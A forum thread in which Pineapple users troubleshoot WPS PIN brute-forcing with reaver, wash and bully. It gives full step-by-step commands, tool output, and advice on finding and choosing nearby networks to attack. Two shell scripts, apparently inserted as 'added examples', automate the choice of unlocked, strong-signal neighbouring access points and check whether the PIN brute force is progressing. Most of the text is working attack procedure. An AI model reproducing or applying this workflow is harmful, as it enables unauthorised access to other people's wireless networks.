
I'd turn off any autostart functions and reboot your pineapple. Go to the Network Tile and the Client Mode Tab, click Disconnect if it's being used. SSH into the pineapple and down the interface ummm -- ifconfig wlan1 down -- then -- airmon-ng start wlan1 -- when the output of airmon-ng displays it may tell you running PIDs that can interfere with reaver, kill the ones that make sense. Don't UP the interface... Try wash at this point -- wash -i mon0 -- if wash isn't working for you here there is something else wrong and I'm not surprised that reaver isn't working either. I could have some of the commands or order wrong above as I'm doing this from memory at work.


Thanks, now it scans! BTW, what does "ifconfig wlan1 down" do? Is WPS Locked "No" or "Yes" good for me? Version 1.0.

Edit: the scan is extremely slow. Is that normal?

After starting: wps log_1399720766.log [May 10 2014 11:40:49]

[+] Waiting for beacon from 00:23:BE:30:4C:74
[+] Associated with 00:23:BE:30:4C:74 (ESSID: deef45)
[+] 0.00% complete @ 2014-05-10 11:20:34 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:21:08 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:21:50 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:22:37 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:23:24 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:24:10 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:24:56 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:27:22 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:28:32 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:29:44 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:31:04 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:33:20 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:36:35 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:37:56 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:38:48 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:39:47 (0 seconds/pin)
[+] 0.00% complete @ 2014-05-10 11:40:49 (0 seconds/pin)
Edited by iluvethreeway

It sets an interface to the down state and typically that is when you change settings like country code or TX power. Yes, the wash scan can take a while as it is collecting probes. WPS lock is bad. It means the router is smart enough to not allow Reaver to work. It is protecting itself. Move on to another router or plan for Reaver to take weeks + to get that pin. It can be set to try one pin after the router turns the lock off but each router is different so it'll take a while to figure it out.


Just got my pineapple, updated to 1.3 and installed a few infusions (including WPS).

I've been having trouble within the WPS GUI (waits for beacons forever) so I dropped to console to start eliminating possibles and my trouble seems to be with something other than the GUI.

I have a wifi router setup as my target with WPS enabled.

First I down the interface (never works with it up and even through the GUI I have to manually down it).

After that I start with airmon-ng:

airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2936 root
Process with PID root ( PID USER VSZ STAT COMMAND
1 root 1524 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
61 root 0 SW [sync_supers]
63 root 0 SW [bdi-default]
65 root 0 SW< [kblockd]
94 root 0 SW [kswapd0]
143 root 0 SW [fsnotify_mark]
155 root 0 SW< [ath79-spi]
166 root 0 SW [mtdblock0]
171 root 0 SW [mtdblock1]
176 root 0 SW [mtdblock2]
181 root 0 SW [mtdblock3]
186 root 0 SW [mtdblock4]
191 root 0 SW [mtdblock5]
232 root 0 SW [kworker/0:1]
422 root 0 SWN [jffs2_gcd_mtd3]
424 root 0 SW [flush-mtd-unmap]
448 root 0 SW [khubd]
459 root 0 SW [scsi_eh_0]
460 root 0 SW [usb-storage]
461 root 0 SW [kworker/0:2]
462 root 0 SW [kworker/u:2]
481 root 1524 S init
516 root 0 SW< [cfg80211]
558 root 0 SW< [rpciod]
568 root 0 SW< [nfsiod]
660 root 1528 S /sbin/syslogd -C16
662 root 1512 S /sbin/klogd
664 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f
676 root 876 S /sbin/ubusd
745 root 1856 S {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke
860 root 1488 S /sbin/netifd
1269 root 0 SW [jbd2/sda1-8]
1270 root 0 SW< [ext4-dio-unwrit]
1376 root 1520 S /sbin/watchdog -t 5 /dev/watchdog
1549 root 0 SW [flush-8:0]
1634 nobody 788 S /usr/sbin/atd
1642 root 1536 S /usr/sbin/crond -c /etc/crontabs -l 5
1648 root 2864 S /usr/sbin/sshd
1671 root 1136 S /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin
1677 root 1160 S /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e
1715 nobody 956 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
1731 root 1520 S /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope
2936 root 1624 S wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80
2963 root 1528 S udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d
3647 root 5488 S {sshd} sshd: root@pts/0
3660 root 1524 S -ash
3692 root 1508 S sleep 10
3702 root 1540 S {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0
3703 root 0 SW [kworker/u:1]
3743 root 1516 R ps -o comm= -p root) is running on interface wlan1
Process with PID root ( PID USER VSZ STAT COMMAND
1 root 1524 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
61 root 0 SW [sync_supers]
63 root 0 SW [bdi-default]
65 root 0 SW< [kblockd]
94 root 0 SW [kswapd0]
143 root 0 SW [fsnotify_mark]
155 root 0 SW< [ath79-spi]
166 root 0 SW [mtdblock0]
171 root 0 SW [mtdblock1]
176 root 0 SW [mtdblock2]
181 root 0 SW [mtdblock3]
186 root 0 SW [mtdblock4]
191 root 0 SW [mtdblock5]
232 root 0 SW [kworker/0:1]
422 root 0 SWN [jffs2_gcd_mtd3]
424 root 0 SW [flush-mtd-unmap]
448 root 0 SW [khubd]
459 root 0 SW [scsi_eh_0]
460 root 0 SW [usb-storage]
461 root 0 SW [kworker/0:2]
462 root 0 SW [kworker/u:2]
481 root 1524 S init
516 root 0 SW< [cfg80211]
558 root 0 SW< [rpciod]
568 root 0 SW< [nfsiod]
660 root 1528 S /sbin/syslogd -C16
662 root 1512 S /sbin/klogd
664 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f
676 root 876 S /sbin/ubusd
745 root 1856 S {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke
860 root 1488 S /sbin/netifd
1269 root 0 SW [jbd2/sda1-8]
1270 root 0 SW< [ext4-dio-unwrit]
1376 root 1520 S /sbin/watchdog -t 5 /dev/watchdog
1549 root 0 SW [flush-8:0]
1634 nobody 788 S /usr/sbin/atd
1642 root 1536 S /usr/sbin/crond -c /etc/crontabs -l 5
1648 root 2864 S /usr/sbin/sshd
1671 root 1136 S /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin
1677 root 1160 S /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e
1715 nobody 956 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
1731 root 1520 S /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope
2936 root 1624 S wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80
2963 root 1528 S udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d
3647 root 5488 S {sshd} sshd: root@pts/0
3660 root 1524 S -ash
3692 root 1508 S sleep 10
3702 root 1552 S {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0
3703 root 0 SW [kworker/u:1]
3744 root 1516 R ps -o comm= -p root) is running on interface wlan1

Interface Chipset Driver
wlan1 RTL8187 rtl8187 - [phy1]
wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon0)

Many other things seem to work on mon0.

When I run reaver, it's failing badly:

root@Pineapple:~# reaver -i mon0 -b C0:C1:C0:8F:E0:91 -c 6 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from C0:C1:C0:8F:E0:91
[+] Associated with C0:C1:C0:8F:E0:91 (ESSID: SPickens)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save.

It will just do that forever if I let it. Sometimes, like 1 in 100, it will make it to M3/4 but still fails.

The pineapple and the target router are separated by about 18-20 feet. I have no trouble with brute forcing this router with a crummy USB wifi stick and kali in a VMware session except the occasional dropping of the mon0 interface, but it shows no WPS transactions failing until it abruptly stops with the mon0 interface.

I have yet to get a single successful WPS transaction... What am I missing?

I have the exact same problem using Reaver.

Pineapple V - latest firmware
WPS Ver. 1.3
Reaver updated
Bully updated

Going into the WPS (ver 1.3) Pineapple infusion, I start wlan1, put it into monitor mode (mon0), select AP and select mon0, then Start, but it still says waiting on beacon from (mac)... Just sits there. Refresh set at 5 sec.

I noticed in the log file it always says Switching mon1 to channel 11 (I selected mon0 because that's the one it shows active when starting monitor mode). Seems like it gets stuck with previous AP settings.

Are there instructions somewhere?

Bully doesn't seem to work for me either..

Edited by WilsonB

I can get to this point using reaver in the WPS infusion, but it doesn't go any further:

wps log_1399880666.log [May 12 2014 07:44:27]
[+] Waiting for beacon from 30:xxxxxx
[+] Associated with 30:xxxx (ESSID: xxxxx)
and just stays here..
(xxxx intentional)
Edited by WilsonB

Guys,

Forget the Infusion for right now.... Do everything via ssh. If you can't get it to work at the command line the Infusion certainly won't work. Use a Kali machine and an Alfa if you want... Just research/learn how it all works first. Then the Infusion just becomes the shortcut it really is.


The biggest help was starting at the command line. The trick is to make sure you're using wlan1 as your mon interface to start off with. I also primarily use the ethernet port to connect to it while it's nearby.

Make sure that wlan0 (default Mk.V AP interface) isn't on the same channel as the target (change it if it is) or do like me and ifconfig it down if you're not using it. You won't have any luck with any remote AP on the same channel as wlan0 is on. I plan on adding a 5GHz AP-capable USB stick in the near future so there is no more interference (or get my LTE stick working).

Command line steps (from a fresh boot up):

1. Down the wlan1 interface: ifconfig wlan1 down

Return: Nothing

2. Start the mon interface: airmon-ng start wlan1

root@Pineapple:~# airmon-ng start wlan1

Interface Chipset Driver
wlan1 RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0)
wlan0 Atheros ath9k - [phy0]

root@Pineapple:~#

(If there is anything other than the above, everything you do afterwards will be flaky as all get out)

3. Look for your target router: wash -i mon0 -C

I had to use -C or I'd just get bad FCS warnings and nothing else.

The mon you should use is the one returned in the parentheses in the previous step "(monitor mode enabled on mon0)"

root@Pineapple:~# wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
--------------------------------------------------------------------------------------
28:C6:8E:8C:90:F6 1 -73 1.0 No #######
E0:91:F5:75:CA:E2 1 -37 1.0 Yes #######
C0:C1:C0:BA:37:5F 1 -62 1.0 No #######
7C:05:07:62:7C:C3 1 -68 1.0 No #######
C0:C1:C0:8F:E0:91 1 -66 1.0 No #######
C0:C1:C0:CC:B1:43 1 -57 1.0 No #######
00:1C:DF:BE:43:47 6 -74 1.0 No #######
00:1F:33:2E:D5:DE 9 -68 1.0 No #######
A0:21:B7:80:22:22 9 -71 1.0 No #######
7C:05:07:29:EF:E7 11 -61 1.0 No #######
00:22:75:D2:5C:7E 11 -67 1.0 No #######
48:F8:B3:A3:15:31 11 -67 1.0 No #######
CC:B2:55:3C:F3:9C 11 -71 1.0 No #######
0C:54:A5:54:84:6B 1 -71 1.0 No #######
^C
root@Pineapple:~#

(my router is the one with the WPS Locked. I also put the ####### in there) Anything with a -65 or lower is going to be hard to crack with lots of timeouts (remember these are negative numbers so -71 is lower than -65). The tiny included antennas are good for about 20-35 meters line of sight tops.

4. Get the MAC address you want and start reaver: reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 1

(-c is for channel, otherwise reaver (and bully) have to scan through each channel before starting. I'm impatient so I give it the clue)

root@Pineapple:~# reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 11

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[?] Restore previous session for E0:91:F5:75:CA:E2? [n/Y]
[+] Restored previous session
[+] Waiting for beacon from E0:91:F5:75:CA:E2
[+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######)
[+] Trying pin 33755670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 33765679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 33775678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
^C
[+] Session saved.
root@Pineapple:~#

4b. Or bully: bully -b E0:91:F5:75:CA:E2 -c 1 -S mon0

5. Is up to you. You can do the same thing on the web interface. Just disable the wlan1 interface, enable monitor mode on wlan1, then use the infusion. Or continue to use the command line with "screen" to allow you to disconnect without quitting reaver.

Edited by SlimPickens
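Steps 2 and 3 of the walkthrough above (and the same sequence given from memory earlier in the thread) are easy to script once the tool output is parsed. The following is an added example and not code from SlimPickens' post or from the Pineapple firmware: it pulls the monitor interface name out of airmon-ng's output, lists stale monX interfaces that should be stopped before re-running airmon-ng, and filters a wash listing down to targets that are unlocked, strong enough and not on the channel your own wlan0 AP sits on. It assumes the BusyBox sh/awk/sed/sort found on the Mark V, the airmon-ng and wash v1.4 output formats quoted above, and the -65 dBm cut-off the post suggests; the function names and the sample inputs (copied from the listings in the post) are this example's own.

```shell
#!/bin/sh
# Helper functions for steps 2 and 3 of the procedure above. Added example, not
# code from the post or the Pineapple firmware. Assumes BusyBox sh/awk/sed/sort,
# airmon-ng 1.x text output and the wash v1.4 column order
# (BSSID Channel RSSI Version Locked ESSID) quoted in this thread.

# Step 2: the monitor interface airmon-ng just created, e.g. "mon0".
# Live use: mon=$(airmon-ng start wlan1 | mon_from_airmon)
mon_from_airmon() {
    sed -n 's/.*(monitor mode enabled on \([a-z0-9]*\)).*/\1/p' | head -n 1
}

# Left-over monitor interfaces to tear down (airmon-ng stop NAME) so the next
# "airmon-ng start wlan1" comes back as mon0 again. Reads one interface per line.
# Live use: ifconfig -a | awk '/^[a-z]/ { print $1 }' | stale_mons mon0
stale_mons() {
    keep="$1"
    grep '^mon[0-9][0-9]*$' | grep -v "^${keep}\$" || true
}

# Step 3: targets from a wash listing that are not WPS locked, at or above
# MIN_RSSI dBm, and not on the channel your own wlan0 AP uses (0 = don't care).
# Prints "BSSID CHANNEL RSSI", strongest first.
# Live use: wash -i mon0 -C | wash_candidates -65 6
wash_candidates() {
    min="$1"; apch="${2:-0}"
    awk -v min="$min" -v apch="$apch" '
        NF >= 6 && $1 ~ /^[0-9A-Fa-f][0-9A-Fa-f]:/ && $5 == "No" &&
        ($3 + 0) >= (min + 0) && ($2 + 0) != (apch + 0) { print $1, $2, $3 }
    ' | sort -k3,3nr
}

# --- constructed sample inputs, copied from the listings in the post above ------
AIRMON_SAMPLE='Interface   Chipset     Driver

wlan1       RTL8187     rtl8187 - [phy1]
                        (monitor mode enabled on mon0)
wlan0       Atheros     ath9k - [phy0]'

IFACES_SAMPLE='lo
eth0
br-lan
wlan0
mon0
mon1'

WASH_SAMPLE='BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------
28:C6:8E:8C:90:F6    1      -73   1.0          No          #######
E0:91:F5:75:CA:E2    1      -37   1.0          Yes         #######
C0:C1:C0:BA:37:5F    1      -62   1.0          No          #######
C0:C1:C0:CC:B1:43    1      -57   1.0          No          #######
00:1C:DF:BE:43:47    6      -74   1.0          No          #######
7C:05:07:29:EF:E7   11      -61   1.0          No          #######
00:22:75:D2:5C:7E   11      -67   1.0          No          #######'

# Demo run over the samples (wlan0 assumed to be on channel 1 here).
printf 'monitor interface: %s\n' "$(printf '%s\n' "$AIRMON_SAMPLE" | mon_from_airmon)"
printf 'stale monitors:    %s\n' "$(printf '%s\n' "$IFACES_SAMPLE" | stale_mons mon0 | tr '\n' ' ')"
echo 'candidates (unlocked, >= -65 dBm, not on channel 1):'
printf '%s\n' "$WASH_SAMPLE" | wash_candidates -65 1
```

Note that the strongest AP in the sample (-37 dBm) is dropped because wash reports it as WPS Locked, and everything on channel 1 is dropped when wlan0 is told to be on channel 1; run with `wash_candidates -65 0` to keep the channel-1 targets.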


Man, thank you so much!! This was one of the best tutorials I have ever seen on this. Thanks.

I will prob. write an automated script to run, write file & email info and put it into one of the dip switches.

I bought one of the gender changers for the antenna, so I can add a bigger one if wanted.

Edited by WilsonB

A good rundown. The -C when using wash is a great tip, as is making sure your Pineapple's access point isn't using the same frequency. But honestly that last one I've never done. It's never been an issue that I know of.

wifite.py is a great script but it doesn't crack WPS pins.


Honestly, I am now using wifite.py from command line and seems to work nicely.. less typing the better. Plan to SSH to it from my Note 3 when traveling

It's always better to know the longhand first. You can work up from there no matter where you find yourself.

;)

..Only bad thing about that creed is there is always more longhand to learn. But man it is fun.


[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670

I am still having this issue... Any ideas?


I think that's what I would get if the wlan0 AP interface was on the same channel as my target. Or maybe it was what I would get if I used wlan0 for the mon interface.

Remember you want to use airmon-ng start wlan1 then use the mon interface it reports, if it reports more than one use airmon-ng stop monX like: airmon-ng stop mon0 until it reports only:

Interface Chipset Driver
wlan1 RTL8187 rtl8187 - [phy1]
wlan0 Atheros ath9k - [phy0]

Then airmon-ng start wlan1, and use mon0 for all "-i" with wash, reaver, and bully.

What's the signal strength reported by wash and what channel is wlan0 and your target on? Be sure that there aren't any more powerful APs on the same channel. When my main network AP is on channel 6, I have to switch it to something else before I can target any further away APs on that channel.

Also there are cases that APs reported by wash just won't be attackable. But before you give up give bully a try.

Edited by SlimPickens
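The two kinds of reaver -vv output in this thread look alike at a glance but mean different things: the log just above never gets past the EAP identity exchange and times out, while the walkthrough's run reaches M3, sends M4 and gets a WSC NACK back for every PIN. Here is an added example, not code from the thread or from reaver, that summarises a saved log and gives a one-word verdict. It assumes reaver 1.4's message wording as quoted in this thread and BusyBox sh/awk; the function name `reaver_stats`, the verdict categories and the two sample logs (copied from the posts) are this example's own. In the WPS registration protocol reaver plays registrar: M4 proves the first half of the PIN and M6 the second half, so a NACK straight after M4 or M6 is the AP rejecting that half, which is the normal wrong-PIN path and means the brute force is working.

```shell
#!/bin/sh
# Added example (not code from the thread or from reaver): sort a reaver -vv log
# into "PINs are actually being tested" versus "the AP never starts the WPS
# exchange with me". Assumes reaver 1.4 message wording and BusyBox sh/awk.
# reaver is the registrar: M4 carries the first-half PIN proof, M6 the second
# half; "Received WSC NACK" right after "Sending M4"/"Sending M6" is a rejected
# half-PIN. A receive timeout before any M1 means the AP never entered the WPS
# exchange at all, which is an interface/channel/signal problem, not a PIN.

reaver_stats() {   # usage: reaver_stats [summary|verdict] < reaver.log
    awk -v mode="${1:-summary}" '
        /Trying pin/               { attempts++; lastsent = "" }
        /Received M1 message/      { m1++ }
        /Received M3 message/      { m3++ }
        /Received M5 message/      { m5++ }
        /Received M7 message/      { m7++ }
        /Sending M[468] message/   { lastsent = $3 }      # "M4", "M6" or "M8"
        /Received WSC NACK/        { if (lastsent == "M4") nack4++; else if (lastsent == "M6") nack6++ }
        /Receive timeout occurred/ { timeouts++ }
        /code: 0x03/               { eapfail++ }
        END {
            if (mode != "verdict") {
                printf "attempts=%d m1=%d m3=%d m5=%d m7=%d nack_after_m4=%d nack_after_m6=%d timeouts=%d eapfail=%d\n", attempts, m1, m3, m5, m7, nack4, nack6, timeouts, eapfail
            } else if (attempts == 0) {
                print "empty: no PIN attempts in this log"
            } else if (m1 == 0 && timeouts > 0) {
                print "link: the AP never answered with M1, so no PIN was tested yet; fix the monitor interface, channel overlap with wlan0 or signal first"
            } else if (m3 > 0 && timeouts == 0 && eapfail == 0) {
                print "progress: PINs reach M4/M6 and get NACKed, the brute force is working as designed"
            } else if (eapfail > 0) {
                print "eap: the AP aborted the exchange after M2 (EAP failure, code 0x03)"
            } else {
                print "mixed: partial exchanges plus timeouts, check signal strength and retry"
            }
        }'
}

# Constructed sample 1: the log posted above (identity exchange, then timeouts, no M1).
LOG_TIMEOUTS=$(cat <<'EOF'
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
EOF
)

# Constructed sample 2: the working run from the walkthrough (M3 reached, NACK after M4).
LOG_PROGRESS=$(cat <<'EOF'
[+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######)
[+] Trying pin 33755670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 33765679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
EOF
)

# Live use: reaver -i mon0 -b <bssid> -c <ch> -vv | tee reaver.log ; reaver_stats verdict < reaver.log
for sample in "$LOG_TIMEOUTS" "$LOG_PROGRESS"; do
    printf '%s\n' "$sample" | reaver_stats summary
    printf '%s\n' "$sample" | reaver_stats verdict
done
```

The first sample comes out as "link" (three attempts, zero M1, two timeouts) and the second as "progress" (two attempts, both reaching M3 and NACKed after M4). Run under `screen` with `tee`, the verdict can be checked from a second SSH session without interrupting reaver.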

I have wlan0 enabled, wlan1 disabled and wlan2 (alfa) monitored.

I tried to crack my, so the signal is 100% and the channel is 1. I tried another on channel 4, still the same.

EDIT:

The main thing I don't understand is which wlans should be enabled/disabled:

wlan0 should be enabled or disabled?
wlan1 should be enabled or disabled?
wlan2 (that's my alfa) should be enabled or disabled?

Should only one be enabled and the rest disabled, or must all 3 be enabled?

I don't get this.

Edited by iluvethreeway


After doing:

airmon-ng start wlan1

I get:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

and it lists a long list of PID processes.

Also, n00b question: how do I reset the mon? Meaning if I ran it 2X or more, I want to kill all mon on wlan1 and be able to run wlan start again so it goes to mon0.

Thanks

You want the interface you are using to crack to be down. "Down" in ifconfig does not mean the hardware is disabled. The hardware is still there as wlan2, its just not running as an interface for that part of the OS. The reason you do this is so that no other part of the OS is trying to use it while you are using it for cracking.

Thats why airmon-ng warns you about all those pids, one of them could interrupt your cracking by changing the settings or conditions of the hardware behind reaver.

So if you want to use wlan2 for cracking, you want to:

ifconfig wlan2 down

airmon-ng start wlan2

(look for what mon interface number to use in the response)

reaver -i *that_mon_interface_from_airmon-ng's_return* -b *mac* -vv -c *channel*

But I'd start with wlan1, make sure that you have the hang of things, then move on to other hardware.

You can check your work by running just ifconfig and looking at the interfaces.

root@Pineapple:~# ifconfig

br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB

inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1127 errors:0 dropped:0 overruns:0 frame:0

TX packets:24175 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:86006 (83.9 KiB) TX bytes:1082632 (1.0 MiB)

eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1130 errors:0 dropped:0 overruns:0 frame:0

TX packets:24178 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:102810 (100.4 KiB) TX bytes:1083838 (1.0 MiB)

Interrupt:4

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:32058 errors:0 dropped:0 overruns:0 frame:0

TX packets:32058 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:2481231 (2.3 MiB) TX bytes:2481231 (2.3 MiB)

wlan1 Link encap:Ethernet HWaddr 00:13:37:93:58:09

UP BROADCAST MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

See wlan1 is listed? Note the MAC address. 00:13:37:93:58:09

now after ifconfig wlan1 down:

root@Pineapple:~# ifconfig wlan1 down

root@Pineapple:~# ifconfig

br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB

inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1191 errors:0 dropped:0 overruns:0 frame:0

TX packets:24254 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:90726 (88.5 KiB) TX bytes:1089990 (1.0 MiB)

eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1194 errors:0 dropped:0 overruns:0 frame:0

TX packets:24257 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:108426 (105.8 KiB) TX bytes:1091196 (1.0 MiB)

Interrupt:4

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:32114 errors:0 dropped:0 overruns:0 frame:0

TX packets:32114 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:2485571 (2.3 MiB) TX bytes:2485571 (2.3 MiB)

Now here is what it looks like after running airmon-ng start wlan1:

root@Pineapple:~# airmon-ng start wlan1

Interface Chipset Driver

wlan1 RTL8187 rtl8187 - [phy1]

(monitor mode enabled on mon0)

wlan0 Atheros ath9k - [phy0]

root@Pineapple:~#

Note the "(monitor mode enabled on mon0)" and also notice that wlan0 wasn't in any of the ifconfigs but it is still in here (but we are ignoring it because wlan1/mon0 is what were after).
Now ifconfig again:

root@Pineapple:~# ifconfig
br-lan    Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
          inet addr:172.16.42.1  Bcast:172.16.42.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1272 errors:0 dropped:0 overruns:0 frame:0
          TX packets:24378 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:96714 (94.4 KiB)  TX bytes:1099694 (1.0 MiB)

eth0      Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1275 errors:0 dropped:0 overruns:0 frame:0
          TX packets:24381 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:115548 (112.8 KiB)  TX bytes:1100900 (1.0 MiB)
          Interrupt:4

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:32224 errors:0 dropped:0 overruns:0 frame:0
          TX packets:32224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2494087 (2.3 MiB)  TX bytes:2494087 (2.3 MiB)

